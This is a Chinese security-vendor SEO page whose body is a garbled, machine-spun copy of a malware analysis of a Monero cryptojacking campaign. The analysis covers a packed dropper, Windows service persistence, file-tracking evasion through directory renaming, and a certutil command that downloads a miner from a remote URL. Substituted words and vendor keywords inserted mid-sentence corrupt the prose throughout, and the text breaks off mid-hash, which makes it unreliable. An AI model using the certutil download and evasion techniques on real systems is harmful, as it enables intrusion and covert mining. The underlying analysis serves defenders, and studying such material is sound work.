网站安全防护_联通云盾_快速接入-墨者安全-墨者盾
DDOS防御_CC防护_高防CDN服务器_【墨者安全】—墨者盾墨者盾—你的网站贴身保镖!

QQ:800185041
高防免费接入:400-0797-119

渠道合作:156 2527 6999

主页 > 网站防护 > 网站安全防护_联通云盾_快速接入

网站安全防护_联通云盾_快速接入

小墨安全管家 2021-05-02 23:18 网站防护 89 ℃
DDoS防御

网站安全防护_联通云盾_快速接入

我们分析了一具挖掘Monero加密货币的密码劫持攻击。2019年上半年,Monero的美元价值翻了一番多,从46美元增至98美元。加密货币市场的反弹意味着加密劫持关于罪犯。这个使用EternalBlue和DoublePulsar等免费利用的漏洞显示了往常只对民族国家行为者可用的漏洞是怎么逐渐被不这么复杂的网络犯罪所采纳的球员们。球员们使用关于Mimikatz,masscan和WinPcap也提出了一具咨询题,即攻击者的目的不仅仅是分发硬币开采恶意软件。历史上,挖掘硬币的恶意软件向来被视为一种低严峻性的威胁,但像如此的攻击证明了这种威胁是怎么变得更加邪恶的。投币者们基本开始使用银行木马所使用的技术来躲避检测,例如依赖陆地二进制文件(LOLBins)来执行代码、父进程ID(PPID)欺骗以及在执行后躲藏文件和有效负载以保留慎重。背景比特币等加密货币的早期使用者,以太坊和Litecoin基本上注重隐私的个人和货币爱好者。可是,随着时刻的推移,加密货币固有的假名属性吸引了意图不这么高尚的人,即那些希翼减少与犯罪活动有关的金融交易的可追踪性的人。加密货币的差不多要求之一是验证每项交易细节的准确性,DDoS高防,以确保交易仍然安全可靠。加密货币中没有治理当局的概念,核查工作是由全球用户社区(通常称为"矿工")执行的。比特币等加密货币的交易细节是公开的。一组事务记录形成一具称为"块"的单元。交易被验证后,每个区块被分配一具称为"哈希"的唯一代码,并编译完整的交易记录以形成区块链账本。验证并将交易细节添加回区块链的过程需要解决复杂且计算密集的哈希咨询题。作为解决这些咨询题的交换条件,矿工将获得一定数量的加密货币。解决散列咨询题需要大量的计算能力,但能够经过使用gpu和称为ASIC(应用专用集成电路)的专用硬件来加快速度。ASIC成本极高,需要相当大的冷却努力,所以给其所有者带来了天文数字的电费。毫无疑咨询,加密货币开采是一项代价高昂的企业,利用被盗资源举行隐秘开采被称为"加密劫持"。Coin miner恶意软件也能够经过多种想法举行传递,包括恶意电子邮件附件、超链接、驾车下载、危害常见的JavaScript库,CC防御,如JQuery,以及利用电子邮件和web服务器等面向互联网的设备中的漏洞。攻击者还开始使用后攻击工具,使他们可以经过在受损网络中横向挪移来感染多台计算机。加密劫持活动往往遵循加密货币的价值。随着加密货币价值的增加,加密劫持成为犯罪分子越来越有利可图的活动。与勒索软件等其他创收手段相比,它也有好处:勒索软件通常是一次性活动,而且大多数企业不满脚勒索要求。勒索软件攻击引起了人们的注意执法机构。假如使用第三方勒索软件,开辟者通常会从支付的赎金中分一杯羹。勒索软件的开辟需要比硬币挖掘者更高的技能。与大多数恶意软件相比,检测硬币挖掘器是艰难的,DDoS防御,因为挖掘软件能够合法使用。一旦部署了硬币挖掘器,只要被感染的主机在线,演员就能够赚钞票。感染链最近我们遇到了一具提供硬币挖掘恶意软件的网址。有效载荷由Bromium安全平台隔离,并提供了大量数据,以了解攻击是怎么举行的。在这篇博文中,我们分析了它的行为,以及它是怎么使用一套攻击后工具(包括EternalBlue)来扩展对受害者网络的入侵。这不是典型的挖掘硬币的恶意软件。该恶意软件挖掘Monero加密货币。2019年上半年,防DDoS,Monero的美元价值翻了一番多,从46美元增至98美元。这种认识大概是加密劫持攻击对攻击者越来越有吸引力的一具大概缘由,尤其是Monero受到犯罪行为体的青睐,因为与其他加密货币不同,Monero不需要ASIC,所以开采资源较少。最后来,这意味着攻击者能够瞄准低功耗设备,但仍能盈利。图1:2018年12月至2019年6月Monero的美元价值(来源:CoinGecko.com网站)行为分析主dropperFilename:下载.exe大小:90 KB(92160字节)MD5:0fe77bc5e76660ad45379204aa4d013c SHA1:189D75F6485B7F220B143C0DD548D97BD7D81E3F SHA256:6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b此可移植可执行文件(PE)经过URL传递。查看PEStudio中的文件部分,能够看出它是使用UPX打包的,UPX是一具开源打包程序二进制。啥时候快跑,下载.exe解压自身并将解包的文件复制到"C:\WebKitsSdk\2.7.92",文件名为ophgsf.exe文件图3–文件写入事件之后下载.exe新写入的文件将作为的子进程运行下载.exe图4-下载.exe启动流程ophgsf.exe.The接着进程将自身复制到C: 名为的\Windows\SysWOW64tgvbgq.exe并将其标记为一具躲藏文件ophgsf.exe文件将自身复制到另一具位置,接着躲藏它。到使恶意软件在系统中持续存在,ophgsf.exe文件创建并启动名为Abcdef的新服务,其中二进制路径指向C:\Windows\System32\tgvbgq.exe. 因为CreateService API是从32位进程调用的,于是服务的配置设置为WOW64.When processophgsf.exe文件调用StartService API启动注册为服务的二进制文件,它从C:\Windows\SysWOW64名目而不是C:\Windows\System32启动二进制文件\tgvbgq.exe由于Wow64重定向而在二进制路径中提供的。经过DesiredAccess参数值(0xF0137)向服务授予以下权限:标准权限"必需的服务"更改"配置服务"查询"配置服务"状态服务"启动服务"停止服务"用户定义"控件图6"要建立的服务创建"坚持。发射一具二进制到一具Windows服务是一种流行的技术,缘由有特别多。首先,它打破了基于进程链的检测;其次,在服务启动时,即使二进制文件不是有效的服务可执行文件,也始终执行该二进制文件ophgsf.exe文件将自身从C:\WebKitsSdk\2.7.92复制到C:\Windows\SysWOW64作为"126860.bak",接着自行终止Ophgsf.exe文件删除它的二进制文件并创建一具备份文件SunloglicySrv.exe下载并运行下载.exe从URLhxxp://fid[.]霍格努布[.]东南/SunloglicySrv.exe并保存到C:\WebKitsSdk\2.7.92\。Bromium云服务将此威胁分类为Win32。特洛伊。矿工图8–HTTP GET请求和下载响应文件SunloglicySrv.exe.Figure9-下载.exe经营硬币矿工SunloglicySrv.exe.After启动硬币挖掘程序(SunloglicySrv.exe), 下载.exe接着使用命令提示符启动certutil工具(命令提示符).Certutil是一具用于治理数字证书的Windows内置工具。 该有用程序还可用于从远程服务器下载文件。例如,经过使用以下命令,攻击者能够下载文件并将其保存在本地:certutil.exe-urlcache -split-f[URL] 在本例中为DestinationFile,提供的URL是hxxp://fid[.]霍格努布[.]东南/SunloglicySrv.exe目标文件是%SystemRoot%\Temp\SunloglicySrv.exe。我们看到certutil经常被恶意的参与者误用为lobbin。恶意软件作者爱慕使用certutil下载有效负载的缘由之一是使用签名的Microsoft工具较少特别大概被检测到,而不是使用第三方程序。假如使用certutil下载成功,命令行.exe运行文件。我们发觉文件(SunloglicySrv.exe)是同一具硬币矿工下载和推出了早些时候下载.exe图10–使用certutil从网址。之后, 下载.exe将自身挪移到名目"%TEMP%\127172\…..\"并用"TemporaryFile"保存文件。接着将名目"…"重命名为"%TEMP%\127172\"。以这种方式复制文件接着重命名名目的缘由是中断文件跟踪。在名目重命名操作期间,Windows文件系统不提供名目内文件的回调,而且这种技术允许恶意软件作者经过安全解决方案绕过对其二进制文件的跟踪,从而使审核员的工作更加艰难。最终,下载.exe结束它的流程图11-下载.exe将自身复制到用户的%TEMP%名目.SunloglicySrv.exe(Win32。特洛伊木马.Mbt)coin miner进程从C:\WebKitsSdk\2.7.92启动,并将其自身复制到C:\Windows\ugrpkute中,其名称为tpcunli.exe文件. 一旦创建了一具副本,它将遵循同样的想法,即使用文件名"TemporaryFile"将文件从C:\WebKitsSdk\2.7.92移到C:\Users\bruser1729\AppData\Local\Temp\127437\…\中,在将名目重命名为C:\Users\bruser1729\AppData\Local\Temp\127437\之前。文件名:tpcunli.exe文件文件路径:C:\Windows\ugrpkute SHA256:e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03


DDoS防御

当前位置:主页 > 网站防护 > 网站安全防护_联通云盾_快速接入

标签列表
DDoS防御
网站分类
X
 

QQ客服

400-0797-119